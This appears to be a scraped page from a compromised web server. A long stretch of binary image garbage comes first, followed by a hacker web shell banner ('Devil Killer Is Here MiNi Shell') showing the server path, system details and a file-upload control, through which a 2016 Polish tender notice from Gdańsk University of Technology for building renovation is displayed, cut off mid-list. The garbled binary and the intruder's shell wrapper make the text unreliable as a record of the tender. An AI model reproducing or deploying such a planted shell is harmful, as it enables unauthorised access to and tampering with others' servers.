JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160727/161951-N-2016.html

<p class="kh_header"><b>Gdańsk: Remont pomieszczeń  w budynku Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej przy ul. Traugutta 79 oraz w Gmachu Głównym Skrzydło. B na piętrze VII i VIII 
przy ul. Narutowicza 11/12</b><br>
<b>Numer ogłoszenia: 161951 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Wydział Zarządzania i Ekonomii , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 348 60 20, faks +48 58 347 24 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pg.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń  w budynku Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej przy ul. Traugutta 79 oraz w Gmachu Głównym Skrzydło. B na piętrze VII i VIII 
przy ul. Narutowicza 11/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z remontem pomieszczeń w budynku Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej przy ul. Traugutta 79 oraz w Gmachu Głównym Skrzydło B na piętrze VII i VIII przy ul. Narutowicza 11/12
1.	Audytoria 
a.	Demontaż istniejących elementów podestu z wyniesieniem w miejsce wskazane przez Zamawiającego 
b.	Rozebranie posadzki i schodów istniejącego podestu desek podłogowych 
c.	Wykonanie ścianki z płyt GK gr 12,5 mm na profilach 75mm 
d.	Wykonanie okładziny z płyt GK gr 12,5 mm klejonej 
e.	Wykonanie rusztu oraz montaż płyty laminowanej gr 6 mm. Montaż płyt na klej 
f.	Montaż cokołu aluminiowego 
g.	Wykonanie drobnych naprawa podłoża oraz wykonanie wylewki samopoziomującej pod posadzkę. W przypadku stwierdzenia różnicy wysokości stopni należy wykonać korektę stopni.
h.	Ułożenie posadzki z płyt winylowych 61,5x61,5 cm wraz z obłożeniem schodów i montażem listew schodowych. Cechy wykładziny: homogeniczna, antystatyczna, odporna na ścieranie gr P wg badań ITB, antypoślizgowej. Z wykładziny należy wykonać cokół wysokości 10 cm  
i.	Przygotowanie ścian do malowanie w zakresie podestu audytorium oraz malowanie ścian farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
j.	Usunięcie i wywiezienie gruzu oraz pozostałości budowlanych na wysypisko 
k.	Wykonania zasilania elektrycznego stanowisk komputerowych wraz z montażem osprzętu 
l.	Wykonanie instalacji teleinformatycznej wraz z montażem osprzetu 
m.	Modernizacja szafy RACK
n.	Wykonanie niezbędnych pomiarów instalacji teletechnicznej i elektrycznej 
2.	Pomieszczenia sekretariatu 412,413,414
a.	Rozebranie istniejącego sufitu podwieszanego 
b.	Rozebranie ściany działowej
c.	Rozebranie posadzek z deszczułek z oderwaniem listew, cokołów
d.	Rozebranie posadzki z tworzyw sztucznych (wykładzina PCV)
e.	Rozebranie listew odbojowych
f.	Demontaż umywalki
g.	Demontaż rurociągu kanalizacyjnego z PCW
h.	Demontaż baterii, zaworu przelotowego,  podgrzewacza wody
i.	Ścianki działowe z płyt gipsowo-kartonowych gr 12,5 mm, profil 50 mm z wykonaniem wzmocnień pod montaż szafek
j.	Zamontować prowadnice do drzwi przesuwnych na ścianie w pokoju 412 i na ściance aneksu kuchennego, szyny zamaskować płytą GK, malowaną w kolorze ścian, pionowe obrzeża otworu drzwiowego wykończyć listwą odbojową w kolorze drzwi , wstawić skrzydła drzwiowe
k.	Wykonanie maskownic z płyty gk z obrobieniem rozebranej ściany 
l.	Montaż narożników ochronnych 
m.	Licowanie ścian płytkami
n.	Likwidacja pęknięć na ścianach
o.	Przygotowanie ścian do malowanie oraz malowanie ścian farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
p.	Uzupełnienie sufitu podwieszanego 
q.	Wykonanie drobnych naprawa podłoża oraz wykonanie wylewki samopoziomującej pod posadzkę.
r.	Ułożenie posadzki z płyt winylowych 61,5x61,5 cm. Cechy wykładziny: homogeniczna, antystatyczna, odporna na ścieranie gr P wg badań ITB, antypoślizgowej. Z wykładziny należy wykonać cokół wysokości 8 cm  
s.	Obsadzenie kratek wentylacyjnych 
t.	Wykonania instalacji gniazd wraz z montażem osprzętu 
u.	Wykonania instalacji oświetlenia wraz montażem opraw w tym oprawy oświetlenia awaryjnego 
3.	Garaż 
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Malowanie pasów żółto czarnych na ścianach i sufitach 
c.	Malowanie rur i elementów metalowych 
d.	Likwidacja kopert 26 szt, wykonanie nowych kopert 10 szt i oznaczeń miejsc postojowych, wykonanie nowego oznakowania miejsc parkingowych poziomych i pionowych 
e.	Wykonanie izolacji poziomej od wewnątrz w ścianach żelbetowych metodą iniekcji ciekłokrystalicznej 
4.	Pokój 514
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
e.	demontaż listew przypodłogowych z PCV
f.	demontaż wykładziny podłogowej dywanowej 
g.	 naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki
h.	wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, wykładzina ma być wywynięta na ściane na wysokość 10 cm 
5.	Pokój 509
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
6.	Pokój 517
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
7.	Pokój 404
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia 
d.	Likwidacja pęknięć na ścianach
e.	demontaż listew przypodłogowych drewnianych 
f.	Rozebranie parkietu 
g.	 naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki
h.	wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, wykładzina ma być wywynięta na ściane na wysokość 10 cm 
i.	Demontaż i ponowny montaż sufitu podwieszanego uwzgledniającego podział pomieszczeń 
j.	Ścianki działowe z płyt gipsowo-kartonowych gr 12,5 mm, profil 100 mm z wykonaniem wzmocnień pod drzwi 
k.	Dostawa i montaż drzwi 
l.	Wykonania zasilania elektrycznego stanowisk komputerowych wraz z montażem osprzętu 
m.	Wykonania instalacji oświetlenia wraz montażem opraw w tym oprawy oświetlenia awaryjnego 
n.	Wykonanie instalacji teleinformatycznej wraz z montażem osprzetu 
o.	Wykonanie niezbędnych pomiarów instalacji teletechnicznej i elektrycznej 
p.	Modernizacja szafy RACK

8.	Pokój 407 i 407A
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
e.	Demontaż listew przypodłogowych drewnianych
f.	Demontaż parkietu 
g.	Naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki
h.	wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, wykładzina ma być wywynięta na ściane na wysokość 10 cm 
i.	Rozebranie fragmentu sifitu podwieszanego i jego ponowny montaż 
j.	Nadbudowy sciany z płyt GK na profilach metalowch 100 mm na pełną wysokość pomieszczenia 
9.	Pokój 308
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
e.	Wykonanie podłączenia wody: instalacja wody fi 15 L-10,0m, instlacja kanalizacji 2,0 z przekuciem przez ściane, montaż przepływowego podgrzewacza wody, montaz umywalki
f.	Wykonania zasilania elektrycznego stanowisk komputerowych wraz z montażem osprzętu 
g.	Wykonania instalacji oświetlenia wraz montażem opraw w tym oprawy oświetlenia awaryjnego 
h.	Wykonanie instalacji teleinformatycznej wraz z montażem osprzetu 
i.	Wykonanie niezbędnych pomiarów instalacji teletechnicznej i elektrycznej 
j.	Modernizacja szafy RACK
k.	Wykonanie instalacji elektrycznej i teletechnicznej do podłączenia  rzutnika
10.	Pokój 307
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
e.	Demontaż listew przypodłogowych z PCV 
f.	Demontaż wykładziny podłogowej dywanowej 
g.	Naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki, 
h.	wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, wykładzina ma być wywynięta na ściane na wysokość 10 cm 
11.	Pokój 208
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
e.	Wymiana listwy progowej 
12.	Pokój 101 i 102
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
e.	Demontaż listew przypodłogowych z PCV 
f.	Demontaż wykładziny podłogowej PCV 
g.	Naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki, 
h.	wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, wykładzina ma być wywynięta na ściane na wysokość 10 cm 
i.	Demontaż drzwi i zaślepienie otworu drzwiowego płytami GK na konstrukcji metalowej 
j.	Demontaż umywalki wraz z podejściem wod-kan
k.	Wykonania zasilania elektrycznego stanowisk komputerowych wraz z montażem osprzętu 
l.	Wykonania instalacji oświetlenia wraz montażem opraw w tym oprawy oświetlenia awaryjnego 
m.	Wykonanie instalacji teleinformatycznej wraz z montażem osprzetu 
n.	Modernizacja szafy RACK
o.	Wykonanie instalacji elektrycznej i teletechnicznej do podłączenia  rzutnika
p.	Wykonanie niezbędnych pomiarów instalacji teletechnicznej i elektrycznej 
13.	Klatki schodowe
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Malowanie lamperii w kolorze uzgodnionym z Zamawiającym
c.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
14.	Prace malarskie po punkcie ksero na II piętrze 
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Likwidacja pęknięć na ścianach
c.	Likwidacja zbędnego okablowania, korytek i puszek 
15.	Bar 
a.	Wymiana okna na otwierane w profilach aluminiowych ciepłych 
b.	Likwidacja żaluzji 
16.	Portiernia
a.	Likwidacja żaluzji 
b.	Przyklejenie folii weneckiej na szyby 
c.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
d.	Wymiana okna na otwierane w profilach aluminiowych ciepłych
e.	Likwidacja pęknięć na ścianach 
17.	Łazienka dla niepełnosprawnych 
a.	Przesunięcie umywalki 1,50 m: demontaż umywalki, wykonanie nowych podejść wody i wod kan, skucie i uzupełnienie kafli, montaż nowej umywalki  
b.	Wymiana miski ustępowej wraz z dolnopłukiem 
18.	Prace przy rozdzielniach elektrycznych 
a.	Uszczelnienie połączenia styku rozdzielnia elektryczna ściana
b.	Przygotowanie ścian do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym
c.	Malowanie lamperii w kolorze uzgodnionym z Zamawiającym 
19.	Klapa dymowa na Vp klatka damska - uszczelnienie, naprawa poszycia dachu klatka męska
a.	Uszczelnienie klapy dymowej 
b.	Uszczelnienie obróbki blacharskiej: demontaż obóbki wklejenie pasa papy 15,0m2, ponowny montaż obróbki ( w razie potrzeby zamontowanie nowej) demontaż i ponowny montaż wsporników instlacji odgromowej wraz z uszczelnieniem
20.	Wymiana płytek na kostkę przed wejściem do piwnicy klatka męska 
a.	Skucie istniejących płytek 
b.	Rozebranie podłoża betonowego 
c.	Wykonanie podkładu 
d.	Ułożenie kostki betonowej prostokątnej 10x5x8 cm w kolorze uzgodnionym  z Zamawiającym 
21.	Skrzydło B Gmachu Głównego - pok 701 i 806
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
c.	Wyniesienie i wniesienie wyposażenia sal
d.	Likwidacja pęknięć na ścianach
e.	Malowanie farbą olejną drzwi w kolorze uzgodnionym z Zamawiającym
f.	Malowanie farbą olejną grzejników w kolorze jak ściany 
g.	Malowanie farbą olejną rur w kolorze jak ściany Zeskrobanie farby z paprapetu
h.	Malowanie parapetu w kolorze jak ściany 
22.	Skrzydło B Gmachu Głównego prace przy małej windzie na VII i VIII piętrze 
a.	Przygotowanie ścian i sufitów  do malowanie oraz malowanie farbami trudno ścieralnymi i łatwo zmywalnymi w kolorze uzgodnionym z Zamawiającym 
b.	Malowanie lamperii w kolorze uzgodnionym z Zamawiającym
c.	Demontaż lamp oraz innych elementów przed malowaniem i ich ponowny montaż
d.	Likwidacja pęknięć na ścianach i sufitach 
e.	Malowanie farbą olejną drzwi i okien drewnianych  w kolorze uzgodnionym z Zamawiającym
f.	Malowanie farbą olejną grzejników w kolorze jak ściany 
g.	Malowanie farbą olejną rur w kolorze jak ściany
h.	Malowanie kanałów wentylacyjnych w kolorze jak ściany 
i.	Malowanie parapetu w kolorze jak ściany 
Uwaga: Wykonawca ma obowiązek zabezpieczyć lub zdemontować i ponownie zamontować elementy nie malowane. W pomieszczeniach gdzie wymieniane sa posadzki należy zamontować listwy progowe.  Wykonawca ma obowiązek posprzątać (umyć) pomieszcznia p zakończonych pracach dotyczy to pomieszczeń w których prowadzone są prace oraz ciągi komunikacyjne, z których będzie korzystał 
23.	Zamawiający wymaga udzielenia minimum  36-miesięcznej gwarancji na wykonane roboty (licząc od daty podpisania protokołu końcowego i odbioru robót)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.43.00.00-0, 45.44.00.00-3, 45.31.43.00-4, 45.31.43.20-0, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem przystąpienia do przetargu jest wniesienie, przed upływem terminu składania ofert, wadium w wysokości 6000,00 zł (słownie: sześć tysięcy złotych).
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1)	w pieniądzu 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,               z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b, ust. 5, pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275)
3. Wadium wnoszone w pieniądzu wpłacić należy przelewem na rachunek bankowy Zamawiającego nr 64 1160 2202 0000 0001 8607 3782, w Banku Millennium, z dopiskiem: Remont - WZiE PG - wadium
4. Wadium wnoszone w jednej z form określonych w pkt 2 ppkt 2) - 5) następuje poprzez  zdeponowanie za pokwitowaniem oryginału dokumentu w Kwesturze Politechniki Gdańskiej,                  I piętro Gmachu B PG w Gdańsku, przy ul. G. Narutowicza 11/12, w dniach od poniedziałku do piątku, w godz. 900 do 1300 lub przesłanie pocztą na adres Kwestura Politechniki Gdańskiej,                   ul. G. Narutowicza 11/12, 80-233 Gdańsk z dopiskiem: Remont WZiE PG - wadium.
5. Dokument wadialny (poręczenie lub gwarancja) musi być sporządzony zgodnie z obowiązującym prawem i zawierać następujące elementy:
1)	nazwę oraz wskazanie siedziby: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczyciela (Zamawiającego), oraz gwaranta/poręczyciela (banku; instytucji ubezpieczeniowej lub podmiotu poręczającego)
2)	określenie postępowania o udzielenie zamówienia publicznego, którego dotyczy 
3)	kwotę 
4)  	termin ważności 
5) 	mieć formę oświadczenia bezwarunkowego płatnego na pierwsze pisemne żądanie Zamawiającego, 
6) 	być nieodwołalny, 
7) 	obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a, 5 ustawy, 
8) 	a także obejmować cały okres związania ofertą, określony w specyfikacji.
6. Zamawiający dokona zwrotu wadium wszystkim Wykonawcom zgodnie z art. 46 ust. 1 do 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1. Spełniają warunki, określone w art. 22 ust. 1 ustawy, dotyczące: 
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia w niniejszym postępowaniu nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał roboty budowlane polegające na remoncie pomieszczeń na łączną kwotę brutto nie mniejszą niż 200 000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie dysponowania przez Wykonawcę odpowiednim  potencjałem technicznym.
Warunek dot. dysponowania przez Wykonawcę odpowiednim potencjałem technicznym Zamawiający uzna za spełniony na podstawie złożonego oświadczenia - stanowiącego załącznik nr 2 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami posiadającymi wymagane uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi: 
Konstrukcyjno-budowlanej 
Zamawiający uzna za spełniony na podstawie złożonego oświadczenia - stanowiącego załącznik nr 5 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
